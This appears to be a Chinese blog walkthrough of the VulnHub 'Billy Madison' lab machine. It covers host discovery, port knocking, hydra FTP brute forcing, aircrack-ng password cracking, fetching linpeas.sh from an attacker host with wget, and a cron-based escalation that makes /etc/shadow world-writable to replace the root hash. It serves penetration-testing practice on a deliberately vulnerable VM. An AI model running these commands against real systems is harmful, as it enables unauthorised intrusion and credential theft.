当前位置:首页 > 技术 > 正文内容

VulnHub Billy Madison 渗透测试实战

访客 技术 2026年9月4日 1

网络主机探测

使用网络发现工具定位目标主机:

$ sudo netdiscover -r 192.168.234.0/24
扫描完成!显示唯一主机列表
捕获3个ARP请求/响应包,来自3台主机
_________________________________________
 IP地址          MAC地址           计数  长度  MAC厂商/主机名
-----------------------------------------
192.168.234.45  00:0c:29:1f:87:52   1    60  VMware, Inc.
192.168.234.196 20:1e:88:ad:fc:55   1    60  Intel Corporate
192.168.234.177 c6:62:32:b7:68:66   1    60  未知厂商

确定目标机器IP为192.168.234.45

端口与服务扫描

执行全面端口扫描:

sudo nmap -p- 192.168.234.45 --min-rate 8000

通过提高扫描速度快速获取结果

初始访问获取

在SMB服务中发现文本文件,提示Eric的后门已关闭。

通过telnet连接23端口获得重要线索:

telnet 192.168.234.45 23
***** 哈哈!你被暂时禁止了,Billy男孩!
顺便说一句,我抓到你想入侵我的WiFi - 但笑话在你身上!
我不再使用像rkfpuzrahngvat这样的ROT13密码了!
Madison酒店现在是我的了!*****

对ROT13加密字符串解码后获得Web路径,从中发现:

  • Veronica使用姓名作为密码
  • 存在流量文件,文件名与Veronica相关

生成专用密码字典:

cat /usr/share/wordlists/rockyou.txt | grep veronica > passwords.txt

通过目录爆破发现流量文件,分析得到:

  • Eric拥有FTP账户
  • 系统使用敲门服务,需要特定端口序列激活FTP

执行敲门序列后连接FTP服务,在Eric目录发现.note文件,记载后门激活方法和SSH密码位置。

爆破Veronica的FTP密码:

hydra -l veronica -P passwords.txt 192.168.234.45 ftp

登录后下载.eml邮件和.cap流量文件,分析发现WiFi流量,邮件提示WiFi密码即Eric的SSH密码。

破解WiFi密码:

aircrack-ng network.cap -w /usr/share/wordlists/rockyou.txt

同时激活后门服务:

telnet 192.168.234.45 2525

重新扫描发现新服务,使用凭据eric:triscuit*建立SSH连接。

权限提升

本地启动HTTP服务传输提权脚本:

# 攻击机
python3 -m http.server 80

# 目标机
wget http://192.168.234.130/linpeas.sh
chmod +x linpeas.sh

运行脚本发现可疑文件:

eric@BM:/tmp$ md5sum /usr/local/share/sgml/donpcgd
cd3621324a40c20e54aad9ecef2f6ed5

搜索发现漏洞利用方法,执行提权:

touch /tmp/rootme
chmod +x /tmp/rootme
/usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme

监控文件权限变化:

watch -n 5 "ls -la /etc/shadow"

生成root密码哈希:

mkpasswd -m sha-512 password123

替换shadow文件哈希值,完成权限提升。

相关文章

Linux crontab 详解

1) crontab 是什么cron 是 Linux 的定时任务守护进程;crontab 是用来编辑/查看“按时间周期执行命令”的表(cron table)。常见两类:用户 crontab:每个用户一份(crontab -e 编辑)系统级 crontab / cron.d:可指定执行用户(/etc/crontab、/etc/cron.d/*)2) crontab 时间...

富文本里可以允许的 HTML 属性

一、所有标签默认允许的安全属性(极少)class        (可选)id           (通常建议禁用)title️ 注意:id 容易被滥用做锚点注入,很多系统直接禁用class 允许的话最好只允许固定前缀(如 editor-*)二、a 标签允许属性<a href="" t...

Mac 安装 Node.js 指南

方法一:通过官网安装包(最简单,适合初学者)如果你只是想快速安装并开始使用,这是最直接的方法。访问 Node.js 官网。页面会显示两个版本:LTS (Recommended For Most Users):长期支持版,最稳定。建议选这个。Current:最新特性版,包含最新功能但可能不够稳定。下载 .pkg 安装包并运行。按照安装向导点击“下一步”即可完成。方法二:使用 Homebrew 安装(...

Dom\HTML_NO_DEFAULT_NS 的副作用:自动加闭合标签

在使用Dom\HTMLDocument时,Dom\HTML_NO_DEFAULT_NS 将禁止在解析过程中设置元素的命名空间, 此设置是为了与DOMDocument向后兼容而存在的。当使用它时,已知的一个副作用就是:自动加闭合标签例如 </img> 为什么会这样?当你使用:Dom\HTML_NO_DEFAULT_NS文档会变成 无命名空间模式,此时内部更接近 XML...

Laravel 事件和监听器创建

在 Laravel 中,使用 Artisan 命令创建 Events(事件) 和 Listeners(监听器) 是非常高效的。你可以通过以下几种方式来实现:1. 手动创建单个 Event如果你只想创建一个事件类,可以使用 make:event 命令:Bashphp artisan make:event UserRegistered执行后,文件将生成在 app/Even...

自定义域名解析神器 dnsmasq

什么是 dnsmasq?dnsmasq 是一个轻量级、功能强大的网络服务工具,专为小型和中等规模网络设计。它是一个综合的网络基础设施解决方案[1]。dnsmasq 能做什么?功能说明应用场景DNS 转发与缓存将 DNS 查询转发到上游服务器(ISP、Google DNS 等),并在本地缓存结果加快 DNS 查询速度,减少外部 DNS 流量本地 DNS解析本地网络设备的主机名,无需编辑&n...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。